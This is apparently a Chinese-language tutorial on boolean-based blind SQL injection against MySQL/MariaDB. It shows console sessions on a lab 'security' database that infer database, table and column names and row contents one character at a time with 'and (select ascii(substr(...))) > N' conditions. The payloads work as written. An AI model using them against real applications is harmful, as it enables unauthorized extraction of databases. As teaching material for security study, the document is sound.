MySQL_布尔注入

MySQL_布尔注入

1.布尔注入常用函数介绍

  • substr()函数

作用:截取字符串
用法:
substr(string string,num start,num length);
string为字符串
start为起始位置
length为长度

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
MariaDB [security]> select substr('abc',1,1);
+-------------------+
| substr('abc',1,1) |
+-------------------+
| a |
+-------------------+
1 row in set (0.00 sec)

MariaDB [security]> select substr('abc',1,2);
+-------------------+
| substr('abc',1,2) |
+-------------------+
| ab |
+-------------------+
1 row in set (0.00 sec)

MariaDB [security]> select substr('abc',2,1);
+-------------------+
| substr('abc',2,1) |
+-------------------+
| b |
+-------------------+
1 row in set (0.00 sec)

MariaDB [security]>
  • ascii()函数

作用:返回字符串str的字符ASCII码值。如果str值是空字符串,返回0,如果str值是NULL,返回NULL。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
MariaDB [security]> select ascii('');
+-----------+
| ascii('') |
+-----------+
| 0 |
+-----------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii(NULL);
+-------------+
| ascii(NULL) |
+-------------+
| NULL |
+-------------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii('a');
+------------+
| ascii('a') |
+------------+
| 97 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]>

  • char()

作用:ASCII码值转字符

1
2
3
4
5
6
7
8
9
MariaDB [security]> select char(97);
+----------+
| char(97) |
+----------+
| a |
+----------+
1 row in set (0.00 sec)

MariaDB [security]>

2.注入过程

2.1猜库

  • 判断数据库个数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
MariaDB [security]> select * from users where id = 1 and (select count(schema_name) from information_schema.schemata) > 5;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(schema_name) from information_schema.schemata) > 6;
Empty set (0.00 sec)

MariaDB [security]>

MariaDB [security]> select count(schema_name) from information_schema.schemata;
+--------------------+
| count(schema_name) |
+--------------------+
| 6 |
+--------------------+
1 row in set (0.00 sec)

MariaDB [security]>
  • 逐个判断数据库长度

例如判断第1个数据库information_schema长度为18:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
MariaDB [security]> select * from users where id = 1 and (select length(schema_name) from information_schema.schemata limit 0,1) > 17 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(schema_name) from information_schema.schemata limit 0,1) > 18 ;
Empty set (0.00 sec)

MariaDB [security]> select schema_name from information_schema.schemata limit 0,1;
+--------------------+
| schema_name |
+--------------------+
| information_schema |
+--------------------+
1 row in set (0.00 sec)

MariaDB [security]>

  • 判断第一个库第1个字符的ASCII码值
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
MariaDB [security]> select ascii('i');
+------------+
| ascii('i') |
+------------+
| 105 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))) >104;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))) >105;
Empty set (0.00 sec)

MariaDB [security]>
  • 判断第一个库第2个字符的ASCII码值
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
MariaDB [security]> select ascii('n');
+------------+
| ascii('n') |
+------------+
| 110 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),2,1))) >109;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),2,1))) >110;
Empty set (0.00 sec)

MariaDB [security]>

  • 判断当前数据库长度
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
MariaDB [security]> select length(database());
+--------------------+
| length(database()) |
+--------------------+
| 8 |
+--------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(database())) >7;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(database())) >8;
Empty set (0.00 sec)

MariaDB [security]>
  • 判断当前数据库第1个字符的ASCII码值
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
MariaDB [security]> select database();
+------------+
| database() |
+------------+
| security |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii('s');
+------------+
| ascii('s') |
+------------+
| 115 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select database()),1,1))) >114;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select database()),1,1))) >115;
Empty set (0.00 sec)

MariaDB [security]>

2.2猜表

  • 判断当前数据库中表的个数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
MariaDB [security]> select count(table_name) from information_schema.tables where table_schema = database();
+-------------------+
| count(table_name) |
+-------------------+
| 5 |
+-------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(table_name) from information_schema.tables where table_schema = database()) > 4;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(table_name) from information_schema.tables where table_schema = database()) > 5;
Empty set (0.00 sec)

MariaDB [security]>

  • 判断当前数据库中第1个表的长度
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
MariaDB [security]> select length(table_name) from information_schema.tables where table_schema = database() limit 0,1;
+--------------------+
| length(table_name) |
+--------------------+
| 5 |
+--------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1) > 4;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1) > 5;
Empty set (0.00 sec)

MariaDB [security]>

  • 判断当前数据库中第1个表的第一个字符的ASCII码值
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
MariaDB [security]> select table_name from information_schema.tables where table_schema = database() limit 0,1;
+------------+
| table_name |
+------------+
| ceshi |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii('c');
+------------+
| ascii('c') |
+------------+
| 99 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))) > 98;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))) > 99;
Empty set (0.01 sec)

MariaDB [security]>

2.3猜字段

  • 判断当前数据库中第1个表的字段个数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
MariaDB [security]> select count(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database();
+--------------------+
| count(column_name) |
+--------------------+
| 2 |
+--------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database()) > 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database()) > 2;
Empty set (0.00 sec)

MariaDB [security]>
  • 判断当前数据库中第1个表的第1个字段长度
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
table_schema = database() limit 0,1;
+---------------------+
| length(column_name) |
+---------------------+
| 2 |
+---------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1) > 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1) > 2;
Empty set (0.00 sec)

MariaDB [security]>
  • 判断当前数据库中第1个表的第1个字段第1个字符的ASCII码值
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
MariaDB [security]> select column_name from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1;
+-------------+
| column_name |
+-------------+
| id |
+-------------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii('i');
+------------+
| ascii('i') |
+------------+
| 105 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select column_name from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1),1,1))) > 104;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select column_name from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1),1,1))) > 105;
Empty set (0.00 sec)

MariaDB [security]>

2.4猜内容

  • 判断表的数据量
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
MariaDB [security]> select count(*) from ceshi;
+----------+
| count(*) |
+----------+
| 2 |
+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(*) from ceshi) > 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(*) from ceshi) > 2;
Empty set (0.00 sec)

MariaDB [security]>

  • 判断表中第一行数据长度
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
MariaDB [security]> select concat_ws("~",id,user) from ceshi limit 0,1;
+------------------------+
| concat_ws("~",id,user) |
+------------------------+
| 1~haha |
+------------------------+
1 row in set (0.00 sec)

MariaDB [security]> select length(concat_ws("~",id,user)) from ceshi limit 0,1;
+--------------------------------+
| length(concat_ws("~",id,user)) |
+--------------------------------+
| 6 |
+--------------------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(concat_ws("~",id,user)) from ceshi limit 0,1) > 5;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(concat_ws("~",id,user)) from ceshi limit 0,1) > 6;
Empty set (0.00 sec)

MariaDB [security]>

  • 判断表中第一行数据第一个字符的ASCII码值
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
MariaDB [security]> select concat_ws("~",id,user) from ceshi limit 0,1;
+------------------------+
| concat_ws("~",id,user) |
+------------------------+
| 1~haha |
+------------------------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii('1');
+------------+
| ascii('1') |
+------------+
| 49 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select concat_ws("~",id,user) from ceshi limit 0,1),1,1))) > 48;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select concat_ws("~",id,user) from ceshi limit 0,1),1,1))) > 49;
Empty set (0.01 sec)

MariaDB [security]>